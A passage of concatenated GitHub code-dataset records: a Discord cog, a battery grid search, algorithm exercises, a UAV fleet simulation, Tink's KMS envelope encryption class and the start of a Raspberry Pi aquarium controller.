args)\n","repo_name":"chododom/Deep-Reinforcement-Learning","sub_path":"Week12/memory_game.py","file_name":"memory_game.py","file_ext":"py","file_size_in_byte":10120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"71446213871","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nAn example cog to show how things should be done.\n\nAlso provides a simple base for starting a new cog.\n\"\"\"\n# In this case, discord import is not needed, in some cases it may be.\n# import discord\nfrom discord.ext import commands\n\n\nclass ExampleCog(commands.Cog):\n \"\"\"The ping to your pong\"\"\"\n\n def __init__(self, bot):\n \"\"\"Save our bot argument that is passed in to the class.\"\"\"\n self.bot = bot\n\n @commands.command(\n name=\"ping\",\n help=\"The pong to your ping, let's you know that the bot is alive.\")\n async def ping(self, ctx):\n \"\"\"\n Create a simple ping pong command.\n\n This command adds some help text and also required that the user\n have the Member role, this is case-sensitive.\n \"\"\"\n await ctx.send(\"Pong\")\n\n\ndef setup(bot):\n \"\"\"\n Add the cog we have made to our bot.\n\n This function is necessary for every cog file, multiple classes in the\n same file all need adding and each file must have their own setup function.\n \"\"\"\n bot.add_cog(ExampleCog(bot))\n","repo_name":"FelixRandle/Sheffield-Discord-Bot","sub_path":"cogs/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"} +{"seq_id":"7364080267","text":"import pandas as pd\nimport numpy as np\nimport sys, os\nfrom datetime import datetime as dt\nfrom utils_data import make_analysis_dataset, NODES, PATH_DATA\nfrom utils_battery import get_efficiency\nfrom utils_mdp_m import R, R2\nfrom utils_cv import train_test_split, crossval_VI\n\n# define file locations\nPATH_RESULTS = f'{PATH_DATA}results/'\nif not os.path.isdir(PATH_RESULTS):\n os.makedirs(PATH_RESULTS)\nPATH_RESULTS_LOG = f'{PATH_RESULTS}log/'\nif not os.path.isdir(PATH_RESULTS_LOG):\n os.makedirs(PATH_RESULTS_LOG)\n\n\ndef 
learn_modelbased_vi(node_idx, dur, hp_weight_rev, hp_store, hp_ma, R, S, logsuff):\n    # if len(sys.argv) != 3:\n    #     raise Exception(\"usage: python learn_modelbased_approach.py <node_idx> <dur>\")\n    # node_idx = int(sys.argv[1])\n    # dur = int(sys.argv[2])\n\n    # read in data\n    df = make_analysis_dataset(nodes=[NODES[node_idx]])\n\n    # set columns\n    mark_cols = [col for col in df.columns if col.startswith(('lmp_rt_m'))] + ['lmp_da']\n    node_cols = [col for col in df.columns if col.startswith(('node'))] \n    time_cols = [col for col in df.columns if col.startswith(('h_'))] + ['weekday']\n    XOLS_cols = mark_cols + time_cols + node_cols + ['lmp_rt_m1_rolling']\n    Xvi_cols = ['lmp_rt_m1', 'lmp_rt_m2', 'lmp_rt_m1_rolling', 'lmp_da'] + time_cols\n    y_col = 'lmp_rt'\n    group_cols = ['year']\n\n    # set params\n    b_params = {'dur':dur, 'capacity':200}\n    b_params['efficiency'] = get_efficiency(b_params['dur'])\n    kmax=50\n\n    # grid search\n    gssum = {}\n    gssummean = {}\n    for wr in hp_weight_rev:\n        for ws in hp_store:\n            hp = [wr, ws]\n            for ma in hp_ma:\n                # redefine rolling period\n                df['lmp_rt_m1_rolling'] = df.lmp_rt_m1.ewm(alpha=ma).mean()\n                # split data\n                X_tt, y_tt, g_tt, __, __ = train_test_split(df, XOLS_cols, y_col, group_cols, yr_val=2022)\n                # cross validate\n                label = f'wrev={wr}, wstor={ws}, ma={ma}'\n                cvsum, cvsummean = crossval_VI(X_tt, Xvi_cols, y_tt, g_tt, hp, b_params, R, S, kmax, desc=label)\n                print('mean revenue:', cvsummean['cumrev'])\n                gssum[(wr, ws, ma)] = cvsum\n                gssummean[(wr, ws, ma)] = cvsummean\n\n    # save logs\n    summ = pd.DataFrame([])\n    for k, v in gssum.items():\n        d = pd.DataFrame(v)\n        d['w_roll'], d['w_e'], d['ma'] = k[0], k[1], k[2]\n        summ = pd.concat([d, summ])\n    summ.to_csv(f'{PATH_RESULTS}hptune_summ_{NODES[node_idx].lower()}_{dur}.csv', index=False)\n    summ.to_csv(f'{PATH_RESULTS_LOG}hptune_summ_{NODES[node_idx].lower()}_{dur}_{logsuff}.csv', index=False)\n\n\nif __name__ == '__main__':\n\n    node_idx = 0\n    \n    # 4-hr duration\n    # hp_weight_rev = [0.25, 0.5, 0.75, 1.]\n    # hp_store = [0., 5., 25.]\n    # hp_ma = [0.5, 0.9]\n    # learn_modelbased_vi(node_idx, 4, \n    #                     hp_weight_rev, hp_store, hp_ma, R, None,\n    #                     logsuff=dt.now().date().strftime(\"%Y%m%d\"))\n\n    # 100-hr duration\n    hp_weight_rev = [0., 0.25, 0.5, 0.66]\n    hp_store = [5., 1.]\n    hp_ma = [0.5, 0.9]\n    learn_modelbased_vi(node_idx, 100, \n                        hp_weight_rev, hp_store, hp_ma, R2, 5000,\n                        logsuff=dt.now().date().strftime(\"%Y%m%d\"))\n    \n\n","repo_name":"etrieschman/battery-charger","sub_path":"src/gridsearch_VI.py","file_name":"gridsearch_VI.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}{"seq_id":"11583662684","text":"# [Absolute-value heap]\n# Problem 11286\nimport sys\nimport heapq\n\nclass node:\n    def __init__(self, a, b):\n        self.a = a\n        self.b = b\n    def __lt__(self, other):\n        if self.a < other.a:\n            return True\n        elif self.a == other.a:\n            return self.b < other.b\n        else:\n            return False\n    def __str__(self):\n        return str(self.b)\n\nn = int(sys.stdin.readline().rstrip())\nq = []\nfor _ in range(n):\n    inp = int(sys.stdin.readline().rstrip())\n    if inp != 0:\n        heapq.heappush(q, node(abs(inp), inp))\n    else:\n        if len(q) == 0:\n            print(0)\n            continue\n        else:\n            print(heapq.heappop(q))\n","repo_name":"JungChangwoo/Algorithm_PS","sub_path":"Baekjoon/DataStructure/AbsoluteHeap.py","file_name":"AbsoluteHeap.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}{"seq_id":"42147359298","text":"'''\nThese 
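The `node` wrapper class in the heap solution above exists only to order entries by `(|x|, x)`. Pushing plain tuples gives `heapq` the identical ordering without a class, since tuples compare element-wise; a small check:

```python
import heapq

q = []
for v in (1, -1, 2, -2):
    heapq.heappush(q, (abs(v), v))  # ordered first by |v|, then by v
assert [heapq.heappop(q)[1] for _ in range(4)] == [-1, 1, -2, 2]
```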
classes contain all individual UAV agents and the entire fleet. Building this very modular so that\nupdate rules for each agent can easily be added in, plus each UAV could have their own individual dynamics.\nStill need to add in update rules for the UAVs beyond dynamic update. Need to also decide how each UAV will\nhold the top-level synthesized controllers. Also need to translate Estefany's allocation function from Matlab\nto python\n'''\nimport os, imp, csv, re, math, numpy\nfrom Allocation import allocation_function\nfrom WaterControl_controller import TulipStrategy\nfrom random import uniform\n\n\nclass Agent(object):\n def __init__(self, state_truth, state_belief, name, dynamics, goal, region, water_level, pause_interval):\n # Initialize state of the agent\n self.state_truth = state_truth\n self.state_belief = state_belief\n self.name = name\n self.dynamic_model = dynamics()\n self.goal = goal\n self.desired_state = goal\n self.prev_state = state_belief\n self.prev_goal = goal\n self.goal_ind = 0\n self.base = 0\n self.region = region\n self.water_level = water_level\n self.water_dropped = 0\n self.ctrler = None\n self.wtr_ctrler = TulipStrategy()\n self.wtr_output = self.wtr_ctrler.move(0, 0, 0)\n self.sync_signal_prev = 1\n self.sync_signal = 1 # Will need to change eventually... (part of a function that observes other UAVs)\n self.pause_time = -pause_interval\n\n def __str__(self):\n return 'Agent: ' + self.name + ' State: ' + str(self.state)\n\n def __repr__(self):\n return self.__str__()\n\n def update_state_truth(self, tau, ctrl, dist=None, x_override=None):\n if x_override is None:\n self.state_truth = self.dynamic_model.integrate_state(tau, self.state, ctrl, dist)\n else:\n self.state_truth = self.dynamic_model.integrate_state(tau, x_override, ctrl, dist)\n\n def update_state_belief(self, state):\n self.state_belief = state\n\n def sensed_information(self):\n return 'I see nothing for now...'\n\n def update_objective_state(self, loc):\n self.prev_goal = self.goal\n self.goal = loc\n return True if self.prev_goal != self.goal else False\n\n def update_region(self, reg):\n self.region = reg\n return\n\n def update_water_lev(self, water):\n self.water_level = water\n return\n\n # Provides display vectors for triangle representation of self\n def display_loc(self, params):\n center = (self.state_truth[0] - 1, params.height - (self.state_truth[1] - 1))\n rot = numpy.array([[math.cos(self.state_truth[2]), -math.sin(self.state_truth[2])],\n [math.sin(self.state_truth[2]), math.cos(self.state_truth[2])]])\n rot1 = numpy.matmul(rot, params.FRONT_VECTOR)\n rot2 = numpy.matmul(rot, params.BACK_BOT_VECT)\n rot3 = numpy.matmul(rot, params.BACK_TOP_VECT)\n\n loc_center_screen = (params.WIDTH * center[0] + params.WIDTH / 2, params.HEIGHT * center[1] - params.HEIGHT / 2)\n vec1 = (loc_center_screen[0] + rot1[0], loc_center_screen[1] - rot1[1])\n vec2 = (loc_center_screen[0] + rot2[0], loc_center_screen[1] - rot2[1])\n vec3 = (loc_center_screen[0] + rot3[0], loc_center_screen[1] - rot3[1])\n return [vec1, vec2, vec3]\n\n\nclass Fleet(object):\n def __init__(self, graph):\n self.agents = {}\n self.graph = graph\n\n def __str__(self):\n msg = 'Agents:'\n for i in self.agents:\n msg += '\\n Agent: ' + str(i)\n return msg\n\n def __repr__(self):\n return self.__str__()\n\n def add_agent(self, agent):\n self.agents[agent.name] = agent\n return\n\n def allocate(self, env, params):\n allocation_function(self, params, env)\n #for i in self.agents:\n # self.agents[i].goal = [6.0, 8.0, math.pi * 3.0 / 
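`display_loc` above builds the standard 2-D rotation matrix from the UAV heading before offsetting the triangle's display vectors. As a quick sanity check, rotating the unit x-vector by 90 degrees should give the unit y-vector:

```python
import math
import numpy as np

theta = math.pi / 2
rot = np.array([[math.cos(theta), -math.sin(theta)],
                [math.sin(theta),  math.cos(theta)]])
assert np.allclose(rot @ np.array([1.0, 0.0]), [0.0, 1.0])
```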
2.0]\n\n # Used for management of all controllers attached to the agents\n def update_ctrls(self, env, time, params):\n for i in self.agents:\n trigger1 = True if self.agents[i].goal != self.agents[i].prev_goal else False\n if trigger1 is False:\n region = self.region_interpreter(self.agents[i].state_belief, self.agents[i].goal, time)\n #print(region)\n trigger2 = False if region == self.agents[i].region else True\n self.agents[i].update_region(region)\n else:\n # print(self.agents[i].state_belief)\n self.agents[i].update_region(self.region_interpreter(self.agents[i].state_belief, self.agents[i].goal, time))\n #print(self.region_interpreter(self.agents[i].state_belief, self.agents[i].goal))\n trigger2 = True\n #if time > 21:\n #print(self.agents[i].region)\n #print(i)\n #print(self.agents[i].state_belief)\n #print(self.agents[i].state_truth)\n #print(self.agents[i].goal)\n #print(trigger1)\n #print(trigger2)\n\n #input('wait...')\n\n if trigger1 is True or trigger2 is True:\n #print(self.agents[i].state_belief)\n #print(self.agents[i].goal)\n hand = self.directory_interpreter(self.agents[i].state_belief, self.agents[i].goal, time)\n self.agents[i].ctrler = hand.TulipStrategy()\n #print(self.agents[i].region)\n if self.agents[i].region == 1:\n output = self.agents[i].ctrler.move(0, self.agents[i].sync_signal, 0)\n else:\n output = self.agents[i].ctrler.move(0, 0)\n #print(output)\n # print(output[\"loc\"])\n # if time hasn't exceeded the original pause time for the agent plus the interval, don't update agent\n # TODO reimplement\n '''if time - self.agents[i].pause_time < params.stop_interval:\n print('skipped state output below')\n print(time)\n print(self.agents[i].pause_time)\n self.agents[i].control_inputs = (0.0, 0.0)\n continue'''\n\n # gather current location and fire status\n loc = (round(self.agents[i].state_belief[0]), round(self.agents[i].state_belief[1]))\n fire = 1 if env.cells[loc].fire > 0 else 0\n\n # stop signal logic for updating an agent TODO fix stop signal variable\n stop_signal = 0 # if uniform(0,1) > 1 - params.stop_fail else 0\n self.agents[i].pause_time = time if stop_signal == 1 else -params.stop_interval\n\n # move synthesized controller given updates on environment (need to modify so that only two inputs used if\n # other controller is used)\n if self.agents[i].region == 1:\n output = self.agents[i].ctrler.move(fire, self.agents[i].sync_signal, stop_signal)\n else:\n output = self.agents[i].ctrler.move(fire, stop_signal)\n #print(output)\n # print(output[\"loc\"])\n # update controller outputs for angle to reflect true values\n values = re.findall('\\d+', output[\"loc\"])\n\n if int(values[2]) == 1:\n values[2] = math.pi / 2.0\n elif int(values[2]) == 2:\n values[2] = 0.0\n elif int(values[2]) == 3:\n values[2] = 3.0 * math.pi / 2.0\n else:\n values[2] = math.pi\n\n # update various belief states and previous states, plus desired states and control inputs\n self.agents[i].prev_state = self.agents[i].state_belief\n self.agents[i].desired_state = (float(values[0]), float(values[1]), values[2])\n #print(self.agents[i].prev_state)\n #print(self.agents[i].desired_state)\n\n # find control inputs from graph... 
TODO: FIX THIS PORTION\n for n in self.graph.graph:\n # print(n)\n # print(self.agents[i].prev_state)\n if ((abs(self.agents[i].prev_state[0] - n[0]) < 0.00001 or abs(self.agents[i].prev_state[0] - 2 * math.pi - n[0]) < 0.00001) and\n (abs(self.agents[i].prev_state[1] - n[1]) < 0.00001 or abs(\n self.agents[i].prev_state[1] - 2 * math.pi - n[1]) < 0.00001) and\n (abs(self.agents[i].prev_state[2] - n[2]) < 0.00001 or abs(\n self.agents[i].prev_state[2] - 2 * math.pi - n[2]) < 0.00001)):\n parent_node = n\n break\n for n in self.graph.graph[parent_node].children:\n # print n\n # print self.agents[i].desired_state\n if (abs(self.agents[i].desired_state[0] - n[0]) < 0.00001 and\n abs(self.agents[i].desired_state[1] - n[1]) < 0.00001 and\n abs(self.agents[i].desired_state[2] - n[2]) < 0.00001):\n control_in = self.graph.graph[parent_node].children[n][0]\n # print(control_in)\n self.agents[i].control_inputs = (control_in[0], control_in[1])\n # print(self.agents[i].control_inputs)\n\n base = self.agents[i].base\n goal = self.agents[i].goal_ind if base == 0 else 0\n # 4. Update water controller\n wtr_out_prev = self.agents[i].wtr_output\n self.agents[i].wtr_output = self.agents[i].wtr_ctrler.move(base, self.agents[i].sync_signal, goal)\n val = re.findall('\\d+', self.agents[i].wtr_output[\"loc\"])\n # add water dropped by UAV to the appropriate cell\n if wtr_out_prev[\"loc\"] != self.agents[i].wtr_output[\"loc\"]:\n val2 = re.findall('\\d+', wtr_out_prev[\"loc\"])\n env.cells[\n (round(self.agents[i].state_truth[0]), round(self.agents[i].state_truth[1]))].water_accum = \\\n env.cells[\n (round(self.agents[i].state_truth[0]), round(self.agents[i].state_truth[1]))].water_accum + \\\n (float(val2[0]) - float(val[0]))/100.0*params.max_water_capacity\n\n self.agents[i].water_level = int(val[0]) # not necessary I think\n #print(self.agents[i].water_level)\n\n # update goal index and base index to agent's belief (done here because we are assuming the UAV makes it,\n # and that the controller move was enacted correctly\n self.agents[i].goal_ind = 1 if (output[\"GoalPos\"] and self.agents[i].sync_signal_prev) else 0\n self.agents[i].base = 1 if output[\"Base\"] else 0\n\n return\n\n def update(self, env, params, time_step, force_endpoint=False):\n\n # Layout:\n for i in self.agents:\n # Propagate state forward for now (no environmental inputs at the moment)\n self.agents[i].state_truth = self.agents[i].dynamic_model.integrate_state(time_step,\n self.agents[i].state_truth,\n self.agents[i].control_inputs,\n (0.0, 0.0, 0.0))\n\n # 2. 
Update the belief of the agent (for this purpose, this is tied directly to the output of the function)\n if self.agents[i].state_truth[2] < 0.0:\n state2 = math.fmod(self.agents[i].state_truth[2], 2.0 * math.pi)\n state2 = 2.0 * math.pi + state2\n else:\n state2 = math.fmod(self.agents[i].state_truth[2], 2.0 * math.pi)\n\n self.agents[i].state_belief = [self.agents[i].state_truth[0], self.agents[i].state_truth[1], state2]\n\n # returns the module for accessing the class (use return.myClass())\n def directory_interpreter(self, state, goal, time):\n if state[2] < 0.0:\n state2 = math.fmod(state[2], 2.0 * math.pi)\n state2 = 2.0 * math.pi + state2\n else:\n state2 = math.fmod(state[2], 2.0 * math.pi)\n\n if abs(state2) < 0.000001 or abs(state2 - 2 * math.pi) < 0.000001:\n ori = '2'\n elif abs(state2 - math.pi / 2.0) < 0.000001:\n ori = '1'\n elif abs(state2 - math.pi) < 0.000001:\n ori = '4'\n else:\n ori = '3'\n\n file_name = 'G' + str(int(round(goal[0]))) + '_' + str(int(round(goal[1]))) + 'Pos' + str(int(round(state[0]))) \\\n + '_' + str(int(round(state[1]))) + 'Ori' + ori + '.py'\n file_name2 = 'G' + str(int(round(goal[0]))) + '_' + str(int(round(goal[1]))) + 'Pos' + str(int(round(state[0]))) \\\n + '_' + str(int(round(state[1]))) + 'Ori' + ori + 'NB.py'\n top_directory = 'Goal' + str(int(round(goal[0]))) + '_' + str(int(round(goal[1])))\n #if time > 21:\n # print('ctrls/' + top_directory + '/' + file_name)\n # print(os.path.exists('ctrls/' + top_directory + '/' + file_name))\n if os.path.exists('../ctrls/' + top_directory + '/' + file_name2):\n return imp.load_source('TulipStrategy', '../ctrls/' + top_directory + '/' + file_name2)\n else:\n return imp.load_source('TulipStrategy', '../ctrls/' + top_directory + '/' + file_name)\n\n # return region associated with goal\n def region_interpreter(self, state, goal, time):\n if state[2] < 0.0:\n state2 = math.fmod(state[2], 2.0 * math.pi)\n state2 = 2.0 * math.pi + state2\n else:\n state2 = math.fmod(state[2], 2.0 * math.pi)\n\n if abs(state2) < 0.000001 or abs(state2 - 2 * math.pi) < 0.000001:\n ori = '2'\n elif abs(state2 - math.pi / 2.0) < 0.000001:\n ori = '1'\n elif abs(state2 - math.pi) < 0.000001:\n ori = '4'\n else:\n ori = '3'\n\n file_name = 'Fire_UAV_simulation/W_partitions/Goal' + str(int(round(goal[0]))) + '_' + str(int(round(goal[1]))) + '.csv'\n # print(file_name)\n state_name = 'Pos' + str(int(round(state[0]))) + '_' + str(int(round(state[1]))) + 'Ori' + ori\n #print(os.getcwd())\n # print(state_name)\n #if time > 21:\n # print(file_name)\n # print(state_name)\n with open(file_name, 'rb') as f:\n reader = csv.reader(f)\n listy = list(reader)\n\n for i in range(0, len(listy)):\n if state_name in listy[i]:\n return i + 1\n\n return None\n","repo_name":"Joshua-Shaffer/FireUAVs","sub_path":"Off-board_ground/Fire_UAV_simulation/FleetAndAgents.py","file_name":"FleetAndAgents.py","file_ext":"py","file_size_in_byte":14668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72169657710","text":"from collections import defaultdict\nfrom heapq import heappop, heappush\n\n\nclass Graph:\n INF = 10**9\n # Searching Algorithms: DFS, BFS\n\n def __init__(self):\n self.graph = defaultdict(list)\n self.count = defaultdict(lambda: 0)\n\n def addEdge(self, u, v):\n self.graph[u].append(v)\n self.graph[v].append(u)\n\n def BFS(self, numVertex):\n visited = defaultdict(lambda: 0)\n queue = []\n for i in range(1, numVertex+1):\n if visited[i] == 0:\n queue.append(i)\n visited[i] = 1\n while 
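`update`, `directory_interpreter`, and `region_interpreter` above all repeat the same `math.fmod` dance to normalise a heading into `[0, 2*pi)`. Condensed into one helper with a spot check:

```python
import math

def wrap_angle(theta):
    # Normalise an angle into [0, 2*pi), mirroring the fmod pattern above.
    theta = math.fmod(theta, 2.0 * math.pi)
    return theta + 2.0 * math.pi if theta < 0.0 else theta

assert abs(wrap_angle(-math.pi / 2) - 3.0 * math.pi / 2.0) < 1e-12
```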
queue:\n u = queue.pop(0)\n print(u, end=' ')\n for v in self.graph[u]:\n if visited[v] == 0:\n queue.append(v)\n visited[v] = 1\n\n def connectedComponentsBFS(self, numVertex):\n visited = defaultdict(lambda: 0)\n stack = []\n path = []\n for i in range(1, numVertex+1):\n if visited[i] == 0:\n stack.append(i)\n visited[i] = 1\n temp = []\n while stack:\n u = stack.pop()\n temp.append(u)\n for v in self.graph[u]:\n if visited[v] == 0:\n stack.append(v)\n visited[v] = 1\n path.append(temp)\n return path\n\n\ndef xytonum(x, y, n, m):\n return (x-1)*m+y\n\n\ndef show(matrix, n, m):\n for i in range(n+2):\n print(*matrix[i])\n\n\nn, m = list(map(int, input().split()))\ng = Graph()\nmatrix = []\nfor i in range(n+2):\n matrix.append([])\n for j in range(m+2):\n matrix[i].append('.')\nfor i in range(n):\n a = input()\n for j in range(m):\n matrix[i+1][j+1] = a[j]\n# show(matrix, n, m)\n\nban = []\nfor i in range(1, n+1):\n for j in range(1, m+1):\n if matrix[i][j] == \"W\":\n now = xytonum(i, j, n, m)\n for k in range(i-1, i+2):\n for l in range(j-1, j+2):\n if matrix[k][l] == \"W\":\n then = xytonum(k, l, n, m)\n g.addEdge(now, then)\n else:\n ban.append(xytonum(i, j, n, m))\n\n\npath = g.connectedComponentsBFS(n*m)\nres = 0\nfor num in path:\n if len(num) > 1:\n res += 1\n elif len(num) == 1:\n if num[0] not in ban:\n res += 1\nprint(res)\n","repo_name":"tranductri2003/Competitive_Programming","sub_path":"ICPC/ICPC Luyện tập 3/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"6572343328","text":"import struct\n\nfrom tink.proto import tink_pb2\nfrom tink import core\nfrom tink.aead import _aead\n\n_SUPPORTED_DEK_KEY_TYPES = frozenset({\n 'type.googleapis.com/google.crypto.tink.AesGcmKey',\n 'type.googleapis.com/google.crypto.tink.XChaCha20Poly1305Key',\n 'type.googleapis.com/google.crypto.tink.AesCtrHmacAeadKey',\n 'type.googleapis.com/google.crypto.tink.AesEaxKey',\n 'type.googleapis.com/google.crypto.tink.AesGcmSivKey',\n})\n\n\ndef is_supported_dek_key_type(type_url: str) -> bool:\n return type_url in _SUPPORTED_DEK_KEY_TYPES\n\n\nclass KmsEnvelopeAead(_aead.Aead):\n \"\"\"Implements envelope encryption.\n\n Envelope encryption generates a data encryption key (DEK) which is used\n to encrypt the payload. The DEK is then send to a KMS to be encrypted and\n the encrypted DEK is attached to the ciphertext. In order to decrypt the\n ciphertext, the DEK first has to be decrypted by the KMS, and then the DEK\n can be used to decrypt the ciphertext. 
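The lake-counting program above unions 'W' cells through their 8-neighbourhood before counting components. A minimal standalone check that two diagonally adjacent 'W' cells form a single lake:

```python
# Flood-fill component count on a tiny grid: the two diagonal 'W' cells touch
# via the 8-neighbourhood, so they count as one lake.
grid = ["W.", ".W"]
cells = {(i, j) for i, row in enumerate(grid)
         for j, c in enumerate(row) if c == "W"}
seen, lakes = set(), 0
for start in cells:
    if start in seen:
        continue
    lakes += 1
    stack = [start]
    while stack:
        i, j = stack.pop()
        if (i, j) in seen:
            continue
        seen.add((i, j))
        stack.extend((i + di, j + dj)
                     for di in (-1, 0, 1) for dj in (-1, 0, 1)
                     if (i + di, j + dj) in cells)
assert lakes == 1
```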
For further information see\n  https://cloud.google.com/kms/docs/envelope-encryption.\n\n  DEK key template must be a KeyTemplate for any of these Tink AEAD key types\n  (any other key template will be rejected):\n  * AesGcmKey\n  * XChaCha20Poly1305\n  * AesCtrHmacAeadKey\n  * AesEaxKey\n  * AesGcmSivKey\n\n  The ciphertext structure is as follows:\n  * Length of the encrypted DEK: 4 bytes (big endian)\n  * Encrypted DEK: variable length, specified by the previous 4 bytes\n  * AEAD payload: variable length\n  \"\"\"\n\n  # Defines in how many bytes the DEK length will be encoded.\n  DEK_LEN_BYTES = 4\n\n  def __init__(self, key_template: tink_pb2.KeyTemplate, remote: _aead.Aead):\n    if not is_supported_dek_key_type(key_template.type_url):\n      raise core.TinkError(\n          'Unsupported DEK key type: %s' % key_template.type_url\n      )\n    # Create a dek to make sure that it works, so that KmsEnvelopeAead already\n    # fails when it is created, and not just when it is used.\n    # The C++ implementation does the same check, and we want this\n    # implementation to be consistent with the C++ implementation.\n    _ = core.Registry.new_key_data(key_template)\n\n    self.key_template = key_template\n    self.remote_aead = remote\n\n  def encrypt(self, plaintext: bytes, associated_data: bytes) -> bytes:\n    # Get new key from template\n    dek = core.Registry.new_key_data(self.key_template)\n    dek_aead = core.Registry.primitive(dek, _aead.Aead)\n\n    # Encrypt plaintext\n    ciphertext = dek_aead.encrypt(plaintext, associated_data)\n\n    # Wrap DEK key values with remote\n    encrypted_dek = self.remote_aead.encrypt(dek.value, b'')\n\n    # Construct ciphertext, DEK length encoded as big endian\n    enc_dek_len = struct.pack('>I', len(encrypted_dek))\n    return enc_dek_len + encrypted_dek + ciphertext\n\n  def decrypt(self, ciphertext: bytes, associated_data: bytes) -> bytes:\n    ct_len = len(ciphertext)\n\n    # Recover DEK length\n    if ct_len < self.DEK_LEN_BYTES:\n      raise core.TinkError\n\n    dek_len = struct.unpack('>I', ciphertext[0:self.DEK_LEN_BYTES])[0]\n\n    # Basic check if DEK length can be valid.\n    if dek_len > (ct_len - self.DEK_LEN_BYTES) or dek_len < 0:\n      raise core.TinkError\n\n    # Decrypt DEK with remote AEAD\n    encrypted_dek_bytes = ciphertext[self.DEK_LEN_BYTES:self.DEK_LEN_BYTES +\n                                     dek_len]\n    dek_bytes = self.remote_aead.decrypt(encrypted_dek_bytes, b'')\n\n    # Get AEAD primitive based on DEK\n    dek = tink_pb2.KeyData(\n        type_url=self.key_template.type_url,\n        value=dek_bytes,\n        key_material_type=tink_pb2.KeyData.SYMMETRIC,\n    )\n    dek_aead = core.Registry.primitive(dek, _aead.Aead)\n\n    # Extract ciphertext payload and decrypt\n    ct_bytes = ciphertext[self.DEK_LEN_BYTES + dek_len:]\n\n    return dek_aead.decrypt(ct_bytes, associated_data)\n","repo_name":"google/tink","sub_path":"python/tink/aead/_kms_envelope_aead.py","file_name":"_kms_envelope_aead.py","file_ext":"py","file_size_in_byte":3796,"program_lang":"python","lang":"en","doc_type":"code","stars":13369,"dataset":"github-code","pt":"38"}{"seq_id":"13271298909","text":"def is_leap_year(year):\n    # Define a dictionary where keys are conditions and values are corresponding actions.\n    conditions = {\n        \"divisible_by_4\": lambda: year % 4 == 0,\n        \"divisible_by_100\": lambda: year % 100 == 0,\n        \"divisible_by_400\": lambda: year % 400 == 0,\n    }\n\n    # Leap-year rule: divisible by 4 and (not divisible by 100, or divisible by 400).\n    is_leap = (\n        conditions[\"divisible_by_4\"]() and\n        (not conditions[\"divisible_by_100\"]() or conditions[\"divisible_by_400\"]())\n    )\n\n    return is_leap\n\n# Input from the user\nyear = int(input(\"Enter a year: \"))\n
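The ciphertext layout in the KmsEnvelopeAead docstring above, a 4-byte big-endian DEK length followed by the encrypted DEK and the AEAD payload, round-trips with `struct` exactly as `encrypt` and `decrypt` do:

```python
import struct

encrypted_dek, payload = b"\x01\x02\x03", b"hello"
blob = struct.pack(">I", len(encrypted_dek)) + encrypted_dek + payload
dek_len = struct.unpack(">I", blob[:4])[0]
assert blob[4:4 + dek_len] == encrypted_dek
assert blob[4 + dek_len:] == payload
```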
\n# Check if it's a leap year and print the result\nif is_leap_year(year):\n    print(year, \"is a leap year.\")\nelse:\n    print(year, \"is not a leap year.\")\n","repo_name":"keyanskv/Keyan_0F5EBEE9279FC9B8013431F38180FCFD","sub_path":"Unit 1 - Challenge/challenge_2.py","file_name":"challenge_2.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}{"seq_id":"17115556386","text":"import RPi.GPIO as GPIO\nimport os\nimport glob\nimport time\nfrom datetime import datetime\nimport mysql.connector  # -Enables connection to the MYSQL database\nimport logging  # -Enables writing log files\nimport json  # -To write/read the data files\n\n\n# ----Pin setup (use BOARD pinout)\nextra_relay = 32\nheater_relay = 36\nmainlight_relay = 38\nco2_relay = 40\n\n# -----mysql-connection infos\nwritetomysql = 180  # default is 180 / all 15 minutes\n\n\n# ---Write-Frequency\n# Default value is 5 Seconds\nsleeptime = 5\n\n# ----Get controller input\ncheckinputfile = 5  # default is 60 / all 5 minutes\n\n\n# ---Functions Start\n# ---Loop counters\nloopcounterinput = checkinputfile\nloopcountermysql = writetomysql\n\n# ---Data File Output\nvarread = True\n\n# -----GPIO-Configuration\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(extra_relay, GPIO.OUT)  # free relay\nGPIO.setup(heater_relay, GPIO.OUT)  # heater\nGPIO.setup(mainlight_relay, GPIO.OUT)  # mainlight\nGPIO.setup(co2_relay, GPIO.OUT)  # co2\n\n# ---Text colors\n\n\nclass bcolors:\n    HEADER = '\\033[95m'\n    OKBLUE = '\\033[94m'\n    OKGREEN = '\\033[92m'\n    WARNING = '\\033[93m'\n    FAIL = '\\033[91m'\n    ENDC = '\\033[0m'\n    BOLD = '\\033[1m'\n    UNDERLINE = '\\033[4m'\n\n# ---Controller Input JSON Function\n\n\ndef load_controller_input(JSONnode):\n    #print(\"Read controller input file\")\n\n    inputJSON = open('data/_controller-input.json')\n    controllerinput = json.load(inputJSON)\n    JSONnode = controllerinput['Controller-input'][JSONnode]\n\n    return(str(JSONnode))\n\n\ndef load_controller_mysql(JSONnode):\n    #print(\"Read controller input file\")\n\n    inputJSON = open('data/_controller-input.json')\n    controllerinput = json.load(inputJSON)\n    JSONnode = controllerinput['Controller-input']['MYSQL'][JSONnode]\n\n    return(str(JSONnode))\n\n# --Write JSON\n\n\ndef writeDataFile(datatime, fulltime, aq_main_light_status, aq_co2_status, aq_heater_status, aq_temp_sen):\n    data_RaspberryAQ = {}\n    with open(\"data/\" + datatime + \"_data_RaspberryAQ.json\", 'w') as f:\n\n        data_RaspberryAQ['data'] = [\n            {\n                \"timestamp\": fulltime,\n                \"aq_mainlight_status\": aq_main_light_status,\n                \"aq_co2_status\": aq_co2_status,\n                \"aq_heater_status\": aq_heater_status,\n                \"aq_temp_sen\": aq_temp_sen\n            }\n\n        ]\n\n        json.dump(data_RaspberryAQ, f, indent=4, sort_keys=True)\n\n\n# -- Delete Old Files\n\ndef DelOldFiles(path):\n\n    os.system(\"find \" + path + \" -mtime +30 -print\")\n    